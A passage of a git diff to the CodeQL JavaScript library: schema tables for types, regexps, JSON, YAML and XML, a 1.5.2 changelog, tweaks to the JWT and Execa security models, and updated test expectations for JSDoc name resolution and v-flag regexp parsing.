ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape +| 28 = @regexp_quoted_string +| 29 = @regexp_intersection +| 30 = @regexp_subtraction; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/upgrade.properties b/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/upgrade.properties new file mode 100644 index 000000000000..13f42c6a9d1b --- /dev/null +++ b/javascript/ql/lib/upgrades/c88c69174bd0dd4e95f1bcfbada68a2505e812c3/upgrade.properties @@ -0,0 +1,2 @@ +description: Add support for quoted string, intersection and subtraction +compatibility: backwards diff --git a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll index 9e92f70af69f..42eb94230ae6 100644 --- a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll +++ b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll @@ -4,14 +4,22 @@ private import codeql.util.test.InlineExpectationsTest module Impl implements InlineExpectationsTestSig { private import javascript - final private class LineCommentFinal = LineComment; + final class ExpectationComment = ExpectationCommentImpl; - class ExpectationComment extends LineCommentFinal { - string getContents() { result = this.getText() } + class Location = JS::Location; + + abstract private class ExpectationCommentImpl extends Locatable { + abstract string getContents(); /** Gets this element's location. */ Location getLocation() { result = super.getLocation() } } - class Location = JS::Location; + private class JSComment extends ExpectationCommentImpl instanceof Comment { + override string getContents() { result = super.getText() } + } + + private class HtmlComment extends ExpectationCommentImpl instanceof HTML::CommentNode { + override string getContents() { result = super.getText() } + } } diff --git a/javascript/ql/src/CHANGELOG.md b/javascript/ql/src/CHANGELOG.md index fbd576e4eea7..fef8edd5c801 100644 --- a/javascript/ql/src/CHANGELOG.md +++ b/javascript/ql/src/CHANGELOG.md @@ -1,3 +1,17 @@ +## 1.5.2 + +### Bug Fixes + +* Fixed a bug, first introduced in `2.20.3`, that would prevent `v-html` attributes in Vue files + from being flagged by the `js/xss` query. The original behaviour has been restored and the `v-html` + attribute is once again functioning as a sink for the `js/xss` query. +* Fixed a bug that would in rare cases cause some regexp-based checks + to be seen as generic taint sanitisers, even though the underlying regexp + is not restrictive enough. The regexps are now analysed more precisely, + and unrestrictive regexp checks will no longer block taint flow. +* Fixed a recently-introduced bug that caused `js/server-side-unvalidated-url-redirection` to ignore + valid hostname checks and report spurious alerts after such a check. The original behaviour has been restored. + ## 1.5.1 No user-facing changes. diff --git a/javascript/ql/src/change-notes/released/1.5.2.md b/javascript/ql/src/change-notes/released/1.5.2.md new file mode 100644 index 000000000000..6b0d7b03dece --- /dev/null +++ b/javascript/ql/src/change-notes/released/1.5.2.md @@ -0,0 +1,13 @@ +## 1.5.2 + +### Bug Fixes + +* Fixed a bug, first introduced in `2.20.3`, that would prevent `v-html` attributes in Vue files + from being flagged by the `js/xss` query. The original behaviour has been restored and the `v-html` + attribute is once again functioning as a sink for the `js/xss` query. +* Fixed a bug that would in rare cases cause some regexp-based checks + to be seen as generic taint sanitisers, even though the underlying regexp + is not restrictive enough. The regexps are now analysed more precisely, + and unrestrictive regexp checks will no longer block taint flow. +* Fixed a recently-introduced bug that caused `js/server-side-unvalidated-url-redirection` to ignore + valid hostname checks and report spurious alerts after such a check. The original behaviour has been restored. diff --git a/javascript/ql/src/codeql-pack.release.yml b/javascript/ql/src/codeql-pack.release.yml index c5775c46013c..7eb901bae56a 100644 --- a/javascript/ql/src/codeql-pack.release.yml +++ b/javascript/ql/src/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.5.1 +lastReleaseVersion: 1.5.2 diff --git a/javascript/ql/src/codeql-suites/javascript-ccr.qls b/javascript/ql/src/codeql-suites/javascript-code-quality.qls similarity index 100% rename from javascript/ql/src/codeql-suites/javascript-ccr.qls rename to javascript/ql/src/codeql-suites/javascript-code-quality.qls diff --git a/javascript/ql/src/experimental/Security/CWE-347/JWT.qll b/javascript/ql/src/experimental/Security/CWE-347/JWT.qll index ad4a82b67636..2f70938dd8a2 100644 --- a/javascript/ql/src/experimental/Security/CWE-347/JWT.qll +++ b/javascript/ql/src/experimental/Security/CWE-347/JWT.qll @@ -7,7 +7,7 @@ DataFlow::Node unverifiedDecode() { verify .getParameter(2) .getMember("algorithms") - .getUnknownMember() + .getArrayElement() .asSink() .mayHaveStringValue("none") and result = verify.getParameter(0).asSink() @@ -32,7 +32,7 @@ DataFlow::Node verifiedDecode() { not verify .getParameter(2) .getMember("algorithms") - .getUnknownMember() + .getArrayElement() .asSink() .mayHaveStringValue("none") or not exists(verify.getParameter(2).getMember("algorithms")) diff --git a/javascript/ql/src/experimental/semmle/javascript/Execa.qll b/javascript/ql/src/experimental/semmle/javascript/Execa.qll index 2f301ae0bf8c..624b21c5dac6 100644 --- a/javascript/ql/src/experimental/semmle/javascript/Execa.qll +++ b/javascript/ql/src/experimental/semmle/javascript/Execa.qll @@ -72,7 +72,7 @@ module Execa { override predicate isShellInterpreted(DataFlow::Node arg) { // if shell: true then first and second args are sinks // options can be third argument - arg = [this.getArgument(0), this.getParameter(1).getUnknownMember().asSink()] and + arg = [this.getArgument(0), this.getParameter(1).getArrayElement().asSink()] and isExecaShellEnable(this.getParameter(2)) or // options can be second argument diff --git a/javascript/ql/src/meta/alerts/TaintedNodes.ql b/javascript/ql/src/meta/alerts/TaintedNodes.ql index da9f7bab6f46..e64788bfc6cd 100644 --- a/javascript/ql/src/meta/alerts/TaintedNodes.ql +++ b/javascript/ql/src/meta/alerts/TaintedNodes.ql @@ -4,7 +4,7 @@ * via default taint-tracking steps. * @kind problem * @problem.severity recommendation - * @tags meta + * @tags meta-expensive * @id js/meta/alerts/tainted-nodes * @precision very-low */ diff --git a/javascript/ql/src/qlpack.yml b/javascript/ql/src/qlpack.yml index 13340bf0766b..7556097a440e 100644 --- a/javascript/ql/src/qlpack.yml +++ b/javascript/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-queries -version: 1.5.1 +version: 1.5.2 groups: - javascript - queries diff --git a/javascript/ql/test/ApiGraphs/async-await/wrap-async-in-thunk.js b/javascript/ql/test/ApiGraphs/async-await/wrap-async-in-thunk.js new file mode 100644 index 000000000000..7e8bd9598341 --- /dev/null +++ b/javascript/ql/test/ApiGraphs/async-await/wrap-async-in-thunk.js @@ -0,0 +1,26 @@ +import * as t from "testlib"; + +async function getData1() { + const data = await fetch("https://example.com/content"); + return data.json(); /* def=moduleImport("testlib").getMember("exports").getMember("foo").getParameter(0).getReturn().getPromised() */ +} + +export function use1() { + t.foo(() => getData1()); +} + +async function getData2() { + const data = await fetch("https://example.com/content"); + return data.json(); /* def=moduleImport("testlib").getMember("exports").getMember("foo").getParameter(0).getReturn().getPromised() */ +} + +export function use2() { + t.foo(getData2); +} + +export function use3() { + t.foo(async () => { + const data = await fetch("https://example.com/content"); + return data.json(); /* def=moduleImport("testlib").getMember("exports").getMember("foo").getParameter(0).getReturn().getPromised() */ + }); +} diff --git a/javascript/ql/test/ApiGraphs/dynamic-prop-read/index.js b/javascript/ql/test/ApiGraphs/dynamic-prop-read/index.js index 14d8b69a741c..cf900bc75254 100644 --- a/javascript/ql/test/ApiGraphs/dynamic-prop-read/index.js +++ b/javascript/ql/test/ApiGraphs/dynamic-prop-read/index.js @@ -2,4 +2,4 @@ const MyStream = require('classes').MyStream; var s = new MyStream(); for (let m of ["write"]) - s[m]("Hello, world!"); /* use=moduleImport("classes").getMember("exports").getMember("MyStream").getInstance().getUnknownMember() */ \ No newline at end of file + s[m]("Hello, world!"); /* use=moduleImport("classes").getMember("exports").getMember("MyStream").getInstance().getArrayElement() */ diff --git a/javascript/ql/test/library-tests/JSDoc/NameResolution/test.expected b/javascript/ql/test/library-tests/JSDoc/NameResolution/test.expected index 04bbd2a2ce0b..97730513195b 100644 --- a/javascript/ql/test/library-tests/JSDoc/NameResolution/test.expected +++ b/javascript/ql/test/library-tests/JSDoc/NameResolution/test.expected @@ -1,5 +1,10 @@ +| bar.js:5:14:5:14 | x | x | | bar.js:5:14:5:18 | x.Foo | ns.very.long.namespace.Foo | +| bar.js:12:14:12:17 | iife | iife | | bar.js:12:14:12:21 | iife.Foo | IIFE.Foo | +| closure.js:8:12:8:15 | goog | goog | +| closure.js:8:12:8:19 | goog.net | goog.net | | closure.js:8:12:8:28 | goog.net.SomeType | goog.net.SomeType | +| closure.js:9:12:9:14 | net | net | | closure.js:9:12:9:23 | net.SomeType | goog.net.SomeType | | closure.js:10:12:10:19 | SomeType | goog.net.SomeType | diff --git a/javascript/ql/test/library-tests/JSDoc/Nodes/tests.expected b/javascript/ql/test/library-tests/JSDoc/Nodes/tests.expected index 32c716421c1e..8c243f7a804a 100644 --- a/javascript/ql/test/library-tests/JSDoc/Nodes/tests.expected +++ b/javascript/ql/test/library-tests/JSDoc/Nodes/tests.expected @@ -278,7 +278,11 @@ test_JSDocTypeExpr | tst.js:26:14:26:20 | boolean | tst.js:26:5:26:11 | @define | 0 | | tst.js:31:13:31:19 | boolean | tst.js:31:4:31:10 | @return | 0 | | tst.js:53:11:53:16 | number | tst.js:53:4:53:8 | @enum | 0 | +| tst.js:68:14:68:17 | goog | tst.js:68:14:68:20 | goog.ds | 0 | +| tst.js:68:14:68:20 | goog.ds | tst.js:68:14:68:34 | goog.ds.BasicNodeList | 0 | | tst.js:68:14:68:34 | goog.ds.BasicNodeList | tst.js:68:4:68:11 | @extends | 0 | +| tst.js:68:19:68:20 | ds | tst.js:68:14:68:20 | goog.ds | 1 | +| tst.js:68:22:68:34 | BasicNodeList | tst.js:68:14:68:34 | goog.ds.BasicNodeList | 1 | | tst.js:95:17:95:21 | Shape | tst.js:95:4:95:14 | @implements | 0 | | tst.js:110:14:110:18 | Shape | tst.js:110:4:110:11 | @extends | 0 | | tst.js:134:13:134:18 | Object | tst.js:134:4:134:10 | @return | 0 | @@ -298,7 +302,9 @@ test_JSDocTypeExpr | tst.js:216:15:216:29 | (string\|number) | tst.js:216:5:216:12 | @typedef | 0 | | tst.js:216:16:216:21 | string | tst.js:216:15:216:29 | (string\|number) | 0 | | tst.js:216:23:216:28 | number | tst.js:216:15:216:29 | (string\|number) | 1 | +| tst.js:219:13:219:16 | goog | tst.js:219:13:219:27 | goog.NumberLike | 0 | | tst.js:219:13:219:27 | goog.NumberLike | tst.js:219:5:219:10 | @param | 0 | +| tst.js:219:18:219:27 | NumberLike | tst.js:219:13:219:27 | goog.NumberLike | 1 | | tst.js:223:12:223:36 | {myNum: number, myObject} | tst.js:223:5:223:9 | @type | 0 | | tst.js:223:20:223:25 | number | tst.js:223:12:223:36 | {myNum: number, myObject} | 0 | | tst.js:226:12:226:17 | number | tst.js:226:12:226:18 | number? | 0 | @@ -311,10 +317,18 @@ test_JSDocTypeExpr | tst.js:234:12:234:29 | function (): number | tst.js:234:4:234:9 | @param | 0 | | tst.js:234:24:234:29 | number | tst.js:234:12:234:29 | function (): number | -1 | | tst.js:235:12:235:46 | function (this: goog.ui.Menu, string) | tst.js:235:4:235:9 | @param | 0 | +| tst.js:235:26:235:29 | goog | tst.js:235:26:235:32 | goog.ui | 0 | +| tst.js:235:26:235:32 | goog.ui | tst.js:235:26:235:37 | goog.ui.Menu | 0 | | tst.js:235:26:235:37 | goog.ui.Menu | tst.js:235:12:235:46 | function (this: goog.ui.Menu, string) | -2 | +| tst.js:235:31:235:32 | ui | tst.js:235:26:235:32 | goog.ui | 1 | +| tst.js:235:34:235:37 | Menu | tst.js:235:26:235:37 | goog.ui.Menu | 1 | | tst.js:235:40:235:45 | string | tst.js:235:12:235:46 | function (this: goog.ui.Menu, string) | 0 | | tst.js:236:12:236:45 | function (new: goog.ui.Menu, string) | tst.js:236:4:236:9 | @param | 0 | +| tst.js:236:25:236:28 | goog | tst.js:236:25:236:31 | goog.ui | 0 | +| tst.js:236:25:236:31 | goog.ui | tst.js:236:25:236:36 | goog.ui.Menu | 0 | | tst.js:236:25:236:36 | goog.ui.Menu | tst.js:236:12:236:45 | function (new: goog.ui.Menu, string) | -2 | +| tst.js:236:30:236:31 | ui | tst.js:236:25:236:31 | goog.ui | 1 | +| tst.js:236:33:236:36 | Menu | tst.js:236:25:236:36 | goog.ui.Menu | 1 | | tst.js:236:39:236:44 | string | tst.js:236:12:236:45 | function (new: goog.ui.Menu, string) | 0 | | tst.js:237:12:237:48 | function (string, ...[number]): number | tst.js:237:4:237:9 | @param | 0 | | tst.js:237:21:237:26 | string | tst.js:237:12:237:48 | function (string, ...[number]): number | 0 | diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/printAst.expected b/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/printAst.expected new file mode 100644 index 000000000000..37d81a9a76b9 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/CombinationOfOperators/printAst.expected @@ -0,0 +1,66 @@ +nodes +| tst.js:1:1:1:44 | [RegExpLiteral] /[[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]]/v | semmle.label | [RegExpLiteral] /[[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]]/v | +| tst.js:1:1:1:45 | [ExprStmt] /[[[ab1 ... a}]]/v; | semmle.label | [ExprStmt] /[[[ab1 ... a}]]/v; | +| tst.js:1:1:1:45 | [ExprStmt] /[[[ab1 ... a}]]/v; | semmle.order | 1 | +| tst.js:1:2:1:42 | [RegExpCharacterClass] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | semmle.label | [RegExpCharacterClass] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | +| tst.js:1:2:1:42 | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | semmle.label | [RegExpSubtraction] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | +| tst.js:1:3:1:15 | [RegExpCharacterClass] [[ab1]&&[b1]] | semmle.label | [RegExpCharacterClass] [[ab1]&&[b1]] | +| tst.js:1:3:1:15 | [RegExpIntersection] [[ab1]&&[b1]] | semmle.label | [RegExpIntersection] [[ab1]&&[b1]] | +| tst.js:1:4:1:8 | [RegExpCharacterClass] [ab1] | semmle.label | [RegExpCharacterClass] [ab1] | +| tst.js:1:5:1:5 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +| tst.js:1:6:1:6 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:1:7:1:7 | [RegExpNormalConstant] 1 | semmle.label | [RegExpNormalConstant] 1 | +| tst.js:1:11:1:14 | [RegExpCharacterClass] [b1] | semmle.label | [RegExpCharacterClass] [b1] | +| tst.js:1:12:1:12 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:1:13:1:13 | [RegExpNormalConstant] 1 | semmle.label | [RegExpNormalConstant] 1 | +| tst.js:1:18:1:20 | [RegExpCharacterClass] [a] | semmle.label | [RegExpCharacterClass] [a] | +| tst.js:1:19:1:19 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +| tst.js:1:23:1:41 | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | semmle.label | [RegExpCharacterClass] [\\p{Number}\\q{z\|a}] | +| tst.js:1:24:1:33 | [RegExpUnicodePropertyEscape] \\p{Number} | semmle.label | [RegExpUnicodePropertyEscape] \\p{Number} | +| tst.js:1:34:1:40 | [RegExpQuotedString] \\q{z\|a} | semmle.label | [RegExpQuotedString] \\q{z\|a} | +| tst.js:1:37:1:37 | [RegExpNormalConstant] z | semmle.label | [RegExpNormalConstant] z | +| tst.js:1:37:1:39 | [RegExpAlt] z\|a | semmle.label | [RegExpAlt] z\|a | +| tst.js:1:39:1:39 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +edges +| tst.js:1:1:1:44 | [RegExpLiteral] /[[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]]/v | tst.js:1:2:1:42 | [RegExpCharacterClass] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | semmle.label | 0 | +| tst.js:1:1:1:44 | [RegExpLiteral] /[[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]]/v | tst.js:1:2:1:42 | [RegExpCharacterClass] [[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]] | semmle.order | 0 | +| tst.js:1:1:1:45 | [ExprStmt] /[[[ab1 ... a}]]/v; | tst.js:1:1:1:44 | [RegExpLiteral] /[[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]]/v | semmle.label | 1 | +| tst.js:1:1:1:45 | [ExprStmt] /[[[ab1 ... a}]]/v; | tst.js:1:1:1:44 | [RegExpLiteral] /[[[ab1]&&[b1]]--[a]--[\\p{Number}\\q{z\|a}]]/v | semmle.order | 1 | +| tst.js:1:2:1:42 | [RegExpCharacterClass] 